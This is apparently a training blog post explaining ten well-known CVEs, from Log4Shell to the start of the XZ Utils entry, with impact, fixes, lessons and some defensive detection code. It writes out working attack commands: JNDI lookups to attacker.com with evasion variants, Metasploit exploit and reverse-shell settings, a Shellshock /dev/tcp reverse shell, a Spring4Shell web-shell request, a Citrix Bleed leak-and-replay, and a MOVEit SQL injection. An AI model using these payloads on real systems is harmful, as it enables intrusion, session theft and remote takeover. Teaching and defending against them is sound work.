10 Real-World CVEs Explained: What Every Security Professional Must Learn (2026)

Top 10 CVE Explained
By HOC Team  |  Last updated: June 2026  |  Read time: ~22 min

The best way to understand how to defend systems is to understand exactly how they were broken. Every major CVE in history is a masterclass in how attackers think, how software fails, and how a single overlooked vulnerability can cascade into a global crisis. Log4Shell brought down enterprise infrastructure worldwide. EternalBlue powered the WannaCry ransomware that paralysed hospitals. Heartbleed silently exposed private keys, passwords, and session tokens for two years before anyone noticed.

This guide walks through 10 of the most important CVEs ever disclosed — not just what they are, but how they worked at a technical level, the real-world damage they caused, how they were patched, and critically — what you as an ethical hacker or security professional must take away from each one. Whether you are preparing for a SOC Analyst interview, studying for OSCP, or hunting bugs on HackerOne, understanding these vulnerabilities will make you a better security professional.

At the end you will find a reference table of all 10.

📖 How to use this guide: Each CVE entry follows the same structure: a plain-English explanation of what the vulnerability is, how the attack works technically, what the real-world impact was, how it was fixed, and the key lesson for penetration testers and defenders. Read them in order or jump to any CVE using the table of contents.
The 10 most important CVEs every security professional must know
1. Log4Shell — Apache Log4j Remote Code Execution
CVE-2021-44228  ·  CVSS Score: 10.0 (Maximum)  ·  CRITICAL
Disclosed: Dec 9, 2021  ·  Type: RCE  ·  Auth needed: None  ·  Affected: Billions of devices
What is it?

Log4j is a Java logging library used in an estimated 3 billion devices worldwide — from enterprise servers to cloud platforms to video games (including Minecraft). Log4Shell is a critical vulnerability in Log4j versions 2.0-beta9 through 2.14.1 that allows an attacker to execute arbitrary code on any server that logs attacker-controlled input.

The beauty — and horror — of Log4Shell is its simplicity. Log4j had a feature called JNDI (Java Naming and Directory Interface) lookup that allowed it to dynamically load content from external servers. An attacker only needed to get a target application to log a specific string.

How the attack works

The attacker sends a malicious string in any field the server logs — a username, HTTP header, User-Agent, search query, or even a Wi-Fi network name. When Log4j processes the string, it interprets the JNDI lookup instruction, reaches out to the attacker's server, downloads a malicious Java class file, and executes it on the target machine.

# Step 1: Attacker sends this string in ANY logged field
${jndi:ldap://attacker.com:1389/exploit}

# Step 2: Vulnerable server receives and LOGS the string
# Step 3: Log4j parses the ${} expression
# Step 4: Log4j makes an LDAP request to attacker.com:1389
# Step 5: Attacker's server responds with a Java class URL
# Step 6: Log4j downloads and EXECUTES the malicious class
# Result: Attacker has Remote Code Execution on the target

# Obfuscated bypasses used to evade WAF rules:
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.com/x}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/x}

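Defender-side detection of the payload forms above, as an added Python example written for this article (not code from the original page): it flattens nested lower:/upper:/default-value lookups the way the Log4j interpolator would, then looks for the jndi: prefix that survives. The sample access-log lines are constructed, and any named lookup inside a ${name:-x} default is assumed not to resolve.

```python
import re
from typing import List, Tuple

# Matches one innermost ${...} lookup, i.e. one with no nested ${ } inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Matches a JNDI lookup once nesting has been flattened. Log4j lower-cases
# the lookup prefix before dispatching it, so the match is case-insensitive.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one innermost lookup the way Log4j's Interpolator would.

    Only the forms the WAF-evasion payloads rely on are modelled:
      ${lower:x} / ${upper:x}  -> case-converted x
      ${::-x} and ${name:-x}   -> default-value syntax; yields x when the
                                  named lookup is empty or unknown
    Any other lookup (jndi:, env:, sys:, ...) is left in place as a marker.
    """
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return "${" + body + "}"
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # Assumption: the named lookup (if any) does not resolve, so the
        # default branch is what the logger would substitute.
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(value: str, max_rounds: int = 32) -> str:
    """Flatten nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        flattened = _INNER.sub(lambda m: _resolve(m.group(1)), value)
        if flattened == value:
            break
        value = flattened
    return value


def is_log4shell(value: str) -> bool:
    """True if the value contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(value)) is not None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalised line) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if is_log4shell(line):
            hits.append((n, normalize(line)))
    return hits


# Constructed sample access-log lines (not real traffic): a benign request,
# the plain payload, the two obfuscated variants, and a harmless lookup.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.com:1389/exploit}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.com/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/x}"',
    '10.0.0.3 - - [10/Dec/2021:03:14:15 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79.1"',
]

if __name__ == "__main__":
    for line_no, normalised in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {normalised}")
```

A plain substring match on "jndi" misses both obfuscated lines; the normaliser reduces each of them to the canonical ${jndi:ldap://attacker.com/x} before the check runs.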
Real-world impact
  • Within 72 hours of disclosure, over 1.8 million exploitation attempts were observed globally
  • Affected products included Apple iCloud, Amazon AWS, Microsoft Azure, Cloudflare, Tesla, Twitter, Minecraft, and thousands of enterprise Java applications
  • Nation-state APT groups (Iran, North Korea, China, Turkey) were exploiting Log4Shell within hours of public disclosure
  • The Belgian Defence Ministry confirmed a breach within days of the CVE going public
  • The US CISA called it "one of the most serious vulnerabilities" ever seen and mandated federal agencies patch within days
How it was fixed

Apache released Log4j 2.15.0 within days, disabling JNDI lookups by default. A second bypass was immediately found (CVE-2021-45046), requiring 2.16.0. The final fix was 2.17.0. The correct mitigation was updating to Log4j 2.17.1+ or setting log4j2.formatMsgNoLookups=true.

🎯 Key lesson for security professionals: Log4Shell teaches three things: (1) supply chain risk — a single library dependency used inside hundreds of other products becomes a single point of global failure; (2) input validation is not enough — the vulnerability was in the logging infrastructure, not the application logic; (3) always check transitive dependencies, not just direct ones. When hunting in bug bounty, any Java application pre-2022 is worth probing with Log4Shell payloads in every header and input field.
2. EternalBlue — WannaCry and NotPetya Ransomware Fuel
CVE-2017-0144  ·  CVSS Score: 9.3  ·  CRITICAL
Disclosed: Apr 14, 2017  ·  Type: RCE / Wormable  ·  Auth needed: None  ·  Protocol: SMBv1 (Port 445)
What is it?

EternalBlue is a vulnerability in Microsoft's SMBv1 (Server Message Block) protocol — the file-sharing protocol used across Windows networks. Originally developed and weaponised by the NSA, it was stolen and leaked by the Shadow Brokers hacking group in April 2017. Microsoft had actually patched it one month earlier (MS17-010 in March 2017) — but millions of Windows machines remained unpatched.

How the attack works

EternalBlue exploits a buffer overflow in the SMBv1 SrvOs2FeaToNt function. By sending a specially crafted packet to port 445, an attacker can write shellcode into kernel memory and execute it with SYSTEM-level privileges — without any authentication, without any user interaction, and without any warning to the victim.

# In Metasploit — the most commonly used exploit module
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
run

# Check if a target is vulnerable with Nmap NSE script
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10

# Output if vulnerable:
# VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1

Real-world impact
  • WannaCry (May 2017) — ransomware using EternalBlue infected 200,000+ machines in 150 countries in 72 hours. UK NHS hospitals were forced to turn away patients. Estimated damage: $4–8 billion.
  • NotPetya (June 2017) — a destructive wiper disguised as ransomware, also using EternalBlue. Caused $10 billion in damages globally. Maersk alone lost $300 million and had to reinstall 45,000 PCs and 4,000 servers from scratch.
  • EternalBlue remains active in the wild in 2026 — millions of unpatched Windows 7 and Windows Server 2008 machines still exist, particularly in industrial and healthcare environments.
How it was fixed

Microsoft released patch MS17-010 in March 2017 — before the leak. In May 2017, Microsoft took the unprecedented step of releasing patches for Windows XP, Vista, and Server 2003 — operating systems it had already ended support for — due to the severity of the outbreak.

🎯 Key lesson for security professionals: EternalBlue is essential knowledge for any penetration tester or SOC analyst. In a pentest, always scan for SMBv1 with nmap --script smb-vuln-ms17-010. In a SOC role, alert on any external connection attempts to port 445 and on Mimikatz-related process names (EternalBlue is frequently paired with credential dumping post-exploitation). Patch management is not optional — MS17-010 was available a month before WannaCry and most victims simply hadn't applied it.
3. Heartbleed — OpenSSL Memory Disclosure
CVE-2014-0160  ·  CVSS Score: 7.5  ·  CRITICAL
Disclosed: Apr 7, 2014  ·  Type: Info Disclosure  ·  Existed: ~2 years silently  ·  Affected: 17% of internet
What is it?

Heartbleed is a memory disclosure vulnerability in OpenSSL — the cryptographic library used to implement SSL/TLS encryption for the majority of the internet. It existed silently for over two years (since December 2011) before being discovered in April 2014, meaning attackers potentially had undetected access to private keys, passwords, and session tokens across millions of HTTPS websites.

The bug is in the TLS Heartbeat extension — a mechanism that keeps SSL connections alive. The server was supposed to echo back whatever the client sent in a heartbeat request. But it never verified the claimed length of the message.

How the attack works

The attacker sends a heartbeat request claiming it contains 64KB of data, but actually only sends 1 byte. The vulnerable OpenSSL server echoes back 64KB of server memory — whatever happens to be in those memory addresses at that moment. This could include: private SSL/TLS keys, session tokens, usernames and passwords, encryption keys, and any other data the server has in memory.

# Check if a target is vulnerable with Nmap
nmap -p 443 --script ssl-heartbleed 192.168.1.10

# If vulnerable:
# VULNERABLE: The Heartbleed Bug is a serious vulnerability
#   State: VULNERABLE
#   Risk factor: High
#   Description: OpenSSL versions 1.0.1 and 1.0.2-beta releases
#   up to and including 1.0.1f and 1.0.2-beta1 contain a flaw
#   in its implementation of the TLS/DTLS heartbeat functionality

# What the leaked memory looks like (real example redacted):
....user=admin&password=S3cr3tP@ss...session_token=abc123xyz...
private_key=-----BEGIN RSA PRIVATE KEY-----...

Real-world impact
  • Estimated 17% of all HTTPS web servers were vulnerable at time of disclosure — approximately 500,000 websites
  • Major services affected included Yahoo Mail, LastPass, OKCupid, Imgur, and many others
  • Canada Revenue Agency had 900 Social Insurance Numbers stolen via Heartbleed and had to take systems offline
  • Because the attack left no logs, it is impossible to know how long attackers had been silently exfiltrating data before disclosure
How it was fixed

OpenSSL 1.0.1g patched the bug on the same day it was publicly disclosed. The fix: validate that the requested response length does not exceed the actual message length before reading from memory. After patching, all SSL certificates and session tokens had to be reissued because any previously issued cert could have been compromised.
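The 1.0.1g length check next to the behaviour it replaced, as an added Python simulation written for this article (not OpenSSL's code): the heartbeat record is laid out as in RFC 6520 (type, 2-byte payload_length, payload, padding), and the bytes that sit after the record in the toy buffer are a constructed stand-in for whatever a real server holds next to it on the heap. The neighbouring data and the 64-byte claim are assumptions chosen to keep the output short.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(claimed_length: int, payload: bytes) -> bytes:
    """Build a heartbeat request; claimed_length may disagree with len(payload)."""
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * MIN_PADDING


class HeartbeatServer:
    """Toy server. The received record is placed at the start of a buffer that
    also holds other data, standing in for whatever sits next to the record
    in a real server's process memory."""

    def __init__(self, record: bytes, neighbouring_memory: bytes):
        self.memory = bytes(record + neighbouring_memory)
        self.record_length = len(record)

    def _header(self):
        return struct.unpack("!BH", self.memory[:3])

    def _echo(self, payload_length: int) -> bytes:
        # The original memcpy(bp, pl, payload) copies payload_length bytes
        # starting right after the 3-byte header, wherever that lands in memory.
        # A Python slice cannot run off the end of the buffer, so the response
        # length is taken from what was actually copied.
        echoed = self.memory[3:3 + payload_length]
        return struct.pack("!BH", HEARTBEAT_RESPONSE, len(echoed)) + echoed + b"\x00" * MIN_PADDING

    def respond_vulnerable(self) -> Optional[bytes]:
        """OpenSSL 1.0.1 to 1.0.1f: trusts the payload_length in the header."""
        hbtype, payload_length = self._header()
        if hbtype != HEARTBEAT_REQUEST:
            return None
        return self._echo(payload_length)

    def respond_fixed(self) -> Optional[bytes]:
        """OpenSSL 1.0.1g: bound payload_length by the actual record length."""
        if 1 + 2 + MIN_PADDING > self.record_length:
            return None  # too short to hold even an empty heartbeat: discard
        hbtype, payload_length = self._header()
        if hbtype != HEARTBEAT_REQUEST:
            return None
        if 1 + 2 + payload_length + MIN_PADDING > self.record_length:
            return None  # claimed payload does not fit in the record: discard silently
        return self._echo(payload_length)


def leaked_bytes(response: Optional[bytes], record_length: int) -> bytes:
    """The part of an echoed payload that came from outside the received record."""
    if response is None:
        return b""
    payload_length = struct.unpack("!H", response[1:3])[0]
    echoed = response[3:3 + payload_length]
    own_bytes = max(0, record_length - 3)  # record bytes that follow the header
    return echoed[own_bytes:]


# Constructed neighbouring memory; stands in for a real server's heap contents.
NEIGHBOURING_MEMORY = b"user=admin&password=S3cr3tP@ss&session_token=abc123xyz"


def demo(claimed_length: int = 64, payload: bytes = b"A") -> dict:
    """Send one request (default: claims 64 bytes, carries 1) to both servers."""
    server = HeartbeatServer(build_heartbeat(claimed_length, payload), NEIGHBOURING_MEMORY)
    return {
        "vulnerable_leak": leaked_bytes(server.respond_vulnerable(), server.record_length),
        "fixed_response": server.respond_fixed(),
    }


if __name__ == "__main__":
    result = demo()
    print("vulnerable server leaked:", result["vulnerable_leak"])
    print("patched server response:", result["fixed_response"])
```

For the lying request the patched server returns nothing at all (the same silent discard the real fix performs), while the vulnerable one echoes 47 bytes that were never part of the request; an honest request (claimed length 1, one byte of payload) is answered identically by both.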

🎯 Key lesson for security professionals: Heartbleed demonstrates that vulnerabilities in shared infrastructure libraries — used by millions of systems — have an outsized impact compared to application-level bugs. Always check TLS libraries with nmap --script ssl-heartbleed during a pentest. In bug bounty, older web servers running OpenSSL 1.0.1 through 1.0.1f are still found occasionally on legacy applications. The lack of logs is the nightmare scenario for defenders — this is why memory-safe languages and regular library audits matter.
4. Shellshock — Bash Remote Code Execution
CVE-2014-6271  ·  CVSS Score: 10.0  ·  CRITICAL
Disclosed: Sep 24, 2014  ·  Type: RCE  ·  Existed: ~25 years  ·  Vector: CGI / DHCP / SSH
What is it?

Shellshock is a vulnerability in the GNU Bash shell that had existed for approximately 25 years before being discovered in 2014. Bash allows environment variables to contain function definitions. The bug: Bash would execute any code appended after a function definition in an environment variable — code that should never have been run at all.

This became catastrophic because of CGI (Common Gateway Interface) web scripts — a mechanism where web servers pass HTTP headers and parameters to shell scripts as environment variables. An attacker could embed malicious code in HTTP headers like User-Agent or Referer and have the web server execute it.

How the attack works

# The core Shellshock test — if this executes, bash is vulnerable
env x='() { :;}; echo "VULNERABLE"' bash -c "echo test"
VULNERABLE
test

# CGI web server exploit via HTTP header (reverse shell)
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.5/4444 0>&1" http://target.com/cgi-bin/status

# Nmap detection script
nmap -p 80 --script http-shellshock 192.168.1.10

# What the payload means:
# () { :;};   = valid bash function definition (triggers the parser)
# after the ; = arbitrary commands Bash executes blindly

Real-world impact
  • Within 24 hours of disclosure, botnets were actively scanning the entire internet for vulnerable CGI scripts
  • Yahoo confirmed a breach via Shellshock — attackers gained access to servers via a vulnerable CGI script
  • Shellshock also affected DHCP clients — a malicious DHCP server on the same network could exploit it to compromise Linux machines requesting IP addresses
  • Akamai's networks were used to distribute Shellshock-based malware within days
🎯 Key lesson for security professionals: Shellshock illustrates the age-old problem: trusted software (Bash has been on almost every Unix system since 1989) can contain critical vulnerabilities that existed for decades before discovery. CGI scripts are still found on legacy web servers — always run nmap --script http-shellshock during web application pentests. In CTFs, web challenges with old Linux servers frequently include Shellshock as the intended exploitation path.
5. BlueKeep — Wormable RDP Remote Code Execution
CVE-2019-0708  ·  CVSS Score: 9.8  ·  CRITICAL
Disclosed: May 14, 2019  ·  Type: RCE / Wormable  ·  Protocol: RDP (Port 3389)  ·  Auth needed: None
What is it?

BlueKeep is a use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows an unauthenticated attacker to execute arbitrary code remotely on systems with RDP exposed on port 3389. Microsoft described it as "wormable" — meaning it could self-propagate across networks the same way WannaCry did — and compared it to EternalBlue in severity.

Affected systems: Windows 7, Windows Server 2003, 2008, and 2008 R2. Windows 8 and Windows 10 were not affected.

How the attack works

The vulnerability exists in the handling of Channel objects in RDP. By sending specially crafted pre-authentication RDP packets, an attacker can free a memory channel object and then trigger code execution in the freed memory region (use-after-free). No user interaction is needed and no authentication is required — connecting to port 3389 is enough.

# Check if target is vulnerable to BlueKeep with Metasploit scanner
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 192.168.1.0/24
run
[+] 192.168.1.15:3389 - The target is vulnerable to CVE-2019-0708 (BlueKeep)

# Nmap RDP check
# Note: rdp-vuln-ms12-020 tests the older MS12-020 RDP flaw (CVE-2012-0002),
# not BlueKeep; Nmap's stock script library has no CVE-2019-0708 check, so
# rely on the Metasploit scanner above for BlueKeep itself.
nmap -p 3389 --script rdp-vuln-ms12-020 192.168.1.15

Real-world impact
  • At time of disclosure, security researchers identified nearly 1 million internet-facing Windows systems vulnerable to BlueKeep
  • A mass exploitation event occurred in November 2019 — attackers deployed cryptocurrency miners via BlueKeep on thousands of machines
  • Unlike WannaCry, no large-scale worm emerged — but BlueKeep remains actively used in targeted attacks, particularly against internet-exposed RDP servers (a common vector for ransomware gangs)
  • The NSA issued a rare public advisory urging immediate patching
🎯 Key lesson for security professionals: Never expose RDP (port 3389) directly to the internet. If RDP access is needed, require it through a VPN. During pentests and external recon, always scan for open port 3389 and run the BlueKeep check — unpatched Windows 7 and Server 2008 machines are still regularly found in corporate environments. In a SOC role, any external connection attempt to port 3389 should generate a high-priority alert.
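The SOC alerting that the EternalBlue and BlueKeep lessons call for (external attempts against 445/3389, plus the internal fan-out a worm such as WannaCry produces), as an added Python example not taken from the article. Assumptions: a constructed key=value firewall log format, RFC 1918 as the organisation's internal address space, and a fan-out threshold of 5 peers.

```python
from collections import defaultdict
from ipaddress import IPv4Address, IPv6Address, ip_address, ip_network
from typing import Dict, List, Set, Tuple, Union

# Ports the two wormable CVEs on this page arrive on.
WATCHED_PORTS = {
    445: "SMBv1 / EternalBlue (CVE-2017-0144)",
    3389: "RDP / BlueKeep (CVE-2019-0708)",
}
# Assumption: the organisation's internal address space is RFC 1918.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# One internal host reaching this many distinct peers on a watched port
# looks like the lateral spread WannaCry relied on. Assumed threshold.
FANOUT_THRESHOLD = 5


def is_internal(addr: Union[IPv4Address, IPv6Address]) -> bool:
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> dict:
    """Parse one key=value firewall log line (constructed format)."""
    fields = dict(token.split("=", 1) for token in line.split())
    return {
        "src": ip_address(fields["src"]),
        "dst": ip_address(fields["dst"]),
        "dport": int(fields["dport"]),
        "action": fields["action"],
    }


def analyse(lines: List[str]) -> List[dict]:
    """Return high-priority alerts for exposed SMB/RDP and worm-like fan-out."""
    alerts: List[dict] = []
    fanout: Dict[Tuple[str, int], Set[str]] = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if ev["dport"] not in WATCHED_PORTS:
            continue
        if not is_internal(ev["src"]):
            # Any external attempt counts, even one the firewall denied:
            # it shows the port is being probed from the internet.
            alerts.append({
                "kind": "external", "src": str(ev["src"]), "dst": str(ev["dst"]),
                "port": ev["dport"], "action": ev["action"], "why": WATCHED_PORTS[ev["dport"]],
            })
        elif ev["action"] == "allow":
            fanout[(str(ev["src"]), ev["dport"])].add(str(ev["dst"]))
    for (src, port), peers in fanout.items():
        if len(peers) >= FANOUT_THRESHOLD:
            alerts.append({
                "kind": "fanout", "src": src, "port": port,
                "peers": len(peers), "why": WATCHED_PORTS[port],
            })
    return alerts


# Constructed sample firewall log (not real traffic): two external probes,
# ordinary internal HTTPS traffic, and one internal host sweeping SMB.
SAMPLE_LOG = [
    "ts=2026-06-01T09:00:01Z src=203.0.113.5 dst=192.168.1.10 dport=445 action=allow",
    "ts=2026-06-01T09:00:02Z src=198.51.100.23 dst=192.168.1.15 dport=3389 action=deny",
    "ts=2026-06-01T09:00:03Z src=192.168.1.50 dst=192.168.1.200 dport=443 action=allow",
    "ts=2026-06-01T09:01:00Z src=192.168.1.77 dst=192.168.1.11 dport=445 action=allow",
    "ts=2026-06-01T09:01:01Z src=192.168.1.77 dst=192.168.1.12 dport=445 action=allow",
    "ts=2026-06-01T09:01:02Z src=192.168.1.77 dst=192.168.1.13 dport=445 action=allow",
    "ts=2026-06-01T09:01:03Z src=192.168.1.77 dst=192.168.1.14 dport=445 action=allow",
    "ts=2026-06-01T09:01:04Z src=192.168.1.77 dst=192.168.1.15 dport=445 action=allow",
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```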
6. PrintNightmare — Windows Print Spooler Privilege Escalation
CVE-2021-34527  ·  CVSS Score: 8.8  ·  HIGH
Disclosed: Jul 1, 2021  ·  Type: LPE + RCE  ·  Service: Windows Spooler  ·  Result: SYSTEM access
What is it?

PrintNightmare is a vulnerability in the Windows Print Spooler service that runs on all Windows machines by default. The vulnerability allows any authenticated user — even a low-privileged domain user — to install printer drivers that execute code with SYSTEM-level privileges. It can also be used for remote code execution across a network.

The vulnerability was made public before a patch existed when security researchers accidentally published a proof-of-concept on GitHub, believing Microsoft had already released a fix. It was removed within hours but had already been forked hundreds of times.

How the attack works

The Windows Print Spooler allows users to install printer drivers. The AddPrinterDriverEx function does not properly validate the privilege level of the calling user. An attacker with any valid domain credentials can call this function to load a malicious DLL that runs as SYSTEM — giving full control of the machine.

# Metasploit module for PrintNightmare
use exploit/windows/dcerpc/cve_2021_1675_printnightmare
set RHOSTS 192.168.1.10
set SMBUser lowprivuser
set SMBPass Password123
run
[*] Sending stage (200262 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# The attack path: low-privilege domain user → SYSTEM in seconds

Real-world impact
  • Ransomware groups including Magniber, Vice Society, and Conti began using PrintNightmare within weeks of disclosure
  • Particularly damaging in Active Directory environments — any domain user could escalate to Domain Admin if a Domain Controller had Print Spooler running (which many did by default)
  • Microsoft's initial patch was incomplete and bypassed within 24 hours, requiring multiple re-patches over several weeks
🎯 Key lesson for security professionals: PrintNightmare is a staple in OSCP and Active Directory pentesting methodology. Any time you have a low-privilege user in a Windows domain environment, check if Print Spooler is running on domain controllers (sc \\dc01 query spooler). If it is running and unpatched, you likely have a path to Domain Admin. Defenders should disable the Print Spooler service on all machines that do not need to print.
7. Spring4Shell — Spring Framework Remote Code Execution
CVE-2022-22965  ·  CVSS Score: 9.8  ·  CRITICAL
Disclosed: Mar 31, 2022  ·  Type: RCE  ·  Framework: Spring MVC / WebFlux  ·  Auth needed: None
What is it?

Spring4Shell is a critical vulnerability in the Spring Framework — one of the most widely used Java application frameworks in the world, particularly in enterprise environments. The vulnerability allows an unauthenticated attacker to achieve remote code execution by manipulating class loader properties through HTTP request parameters.

The name "Spring4Shell" was coined due to its similarity to Log4Shell — both are Java-based, both are unauthenticated RCE, and both affect frameworks used in millions of enterprise applications. Media comparisons to Log4Shell created significant panic when it was disclosed.

How the attack works

Spring's data binding feature allows HTTP request parameters to be bound to Java object properties. By manipulating parameters that control the class.classLoader object, an attacker can write a malicious JSP web shell to the server's web root — which can then be accessed via the browser to execute arbitrary OS commands.

# Proof of concept HTTP request to exploit Spring4Shell
# Writes a JSP web shell to the web root
curl -v http://target.com/vulnerable-endpoint \
  -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di+if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B+java.io.InputStream+in+%3D+%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B+...+%7D%25%7Bsuffix%7Di"

# After the web shell is written, access it:
curl http://target.com/shell.jsp?pwd=j&cmd=id
uid=0(root) gid=0(root) groups=0(root)

Real-world impact
  • Exploitation attempts began within hours of public proof-of-concept code being released
  • Mirai botnet variants began incorporating Spring4Shell exploits within days
  • Unlike Log4Shell, Spring4Shell had more specific requirements (Java 9+, Tomcat deployment, specific Spring configuration) which limited its overall impact — but targeted exploitation against enterprise Java applications was significant
🎯 Key lesson for security professionals: Spring4Shell illustrates the problem with data binding in frameworks — features designed for developer convenience (automatic parameter binding) can become critical attack surfaces when input is not properly restricted. When pentesting Java web applications, always identify the framework version. Any Spring application running on Java 9+ with Tomcat before Spring Framework 5.3.18 / 5.2.20 is potentially vulnerable.
8. Citrix Bleed — Session Token Hijacking
CVE-2023-4966  ·  CVSS Score: 9.4  ·  CRITICAL
Disclosed: Oct 10, 2023  ·  Type: Session Hijack  ·  Product: Citrix ADC / Gateway  ·  Auth needed: None
What is it?

Citrix Bleed is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances — widely used in enterprise networks for load balancing, VPN access, and application delivery. The vulnerability allows an unauthenticated attacker to retrieve valid session tokens from device memory, effectively bypassing authentication and MFA entirely.

The name "Citrix Bleed" was coined due to its similarity to Heartbleed — both leak sensitive data from memory without needing credentials.

How the attack works

By sending a specially crafted HTTP GET request to the NetScaler management interface, an attacker can trigger a buffer over-read that leaks up to 256 bytes of memory per request. This memory frequently contains valid authentication session tokens. With a stolen token, the attacker can log in as any user — including administrators — bypassing passwords and MFA entirely.

# Proof of concept — send malformed request to leak memory
curl -k -v https://citrix-target.com/oauth/idp/.well-known/openid-configuration \
  -H "Host: $(python3 -c 'print("A"*24576)')"

# The response includes leaked memory containing session tokens:
# Look for strings matching: NSC_AAAA[a-zA-Z0-9+/]+ (Citrix session cookie format)

# With the stolen session token — authenticate as any user
curl -k https://citrix-target.com/vpn/index.html \
  -H "Cookie: NSC_AAAA=stolen_session_token_here"

Real-world impact
  • LockBit ransomware group exploited Citrix Bleed to breach Boeing, China Industrial Bank (ICBC), Allen & Overy law firm, and DP World in late 2023
  • ICBC's US operations were so severely disrupted that traders had to hand-deliver trade data on USB drives
  • Mandiant reported that exploitation had been occurring since at least August 2023 — two months before Citrix disclosed it
  • CISA issued an emergency directive mandating federal agencies patch within days
🎯 Key lesson for security professionals: Citrix Bleed is a masterclass in why patching appliances and network edge devices must be as high a priority as patching servers. VPN gateways and load balancers are often overlooked in patch management processes. For pentesters: always identify Citrix NetScaler versions during external recon. For defenders: patch management must include all network appliances, not just Windows endpoints. MFA is not a defence against session token theft — once a valid token is stolen, MFA has already been passed.
9. MOVEit Transfer SQL Injection — Cl0p Ransomware Wave
CVE-2023-34362  ·  CVSS Score: 9.8  ·  CRITICAL
Disclosed: May 31, 2023  ·  Type: SQL Injection → RCE  ·  Auth needed: None  ·  Victims: 2,700+ organisations
What is it?

MOVEit Transfer is a managed file transfer (MFT) application used by thousands of enterprises and government agencies to transfer sensitive files securely. The vulnerability is an unauthenticated SQL injection in MOVEit's web application that allows attackers to read, modify, and delete data from the database — and ultimately execute OS commands on the underlying server.

The Cl0p ransomware group exploited this vulnerability in a mass exploitation campaign in May–June 2023, stealing data from over 2,700 organisations before a patch was even publicly available.

How the attack works

The vulnerability exists in the human.aspx endpoint in MOVEit's web application. By manipulating the X-siLock-Comment HTTP header with SQL injection payloads, an attacker can bypass authentication and query the database directly. Cl0p automated this to steal the sysadmin session token from the database and then upload a web shell called LEMURLOOT to the server.

# Simplified SQL injection payload targeting the auth bypass
# Sent in X-siLock-Comment header to /human.aspx
'; SELECT session_id, LoginName FROM sessions WHERE LoginName='sysadmin'--

# With the stolen session token, upload LEMURLOOT web shell
# LEMURLOOT can: list files, download files, create admin accounts

# Cl0p automated detection of vulnerable instances using:
shodan search "MOVEit Transfer"
# Returned thousands of internet-exposed MOVEit instances

Real-world impact
  • Over 2,700 organisations confirmed breached — the largest single vulnerability exploitation campaign of 2023
  • Victims included US Department of Energy, Shell, British Airways, BBC, Boots pharmacy, Johns Hopkins University, Sony, PricewaterhouseCoopers, Ernst & Young, and many others
  • Data from 93 million individuals was stolen and published on Cl0p's leak site
  • Total estimated damages exceeded $9.9 billion according to Emsisoft's analysis
🎯 Key lesson for security professionals: The MOVEit breach is the clearest recent example of why managed file transfer systems and file sharing applications must be treated as high-value attack targets during pentests — they frequently hold the most sensitive data in an organisation and often lack the same security scrutiny as customer-facing applications. SQL injection in enterprise software in 2023 remains tragically common. For bug bounty hunters: MFT applications, HR systems, and financial software are high-value targets with fewer hunters and higher bounties.
10. XZ Utils Backdoor — Supply Chain Attack
CVE-2024-3094  ·  CVSS Score: 10.0  ·  CRITICAL
Disclosed: Mar 29, 2024  ·  Type: Supply Chain / Backdoor  ·  Target: Linux SSH (sshd)  ·  Campaign: ~2 years
What is it?

The XZ Utils backdoor is unlike any other CVE on this list. It was not a coding mistake — it was a deliberately planted backdoor, inserted by a sophisticated threat actor who spent nearly two years building trust as an open-source contributor before introducing malicious code into a widely-used Linux compression library.

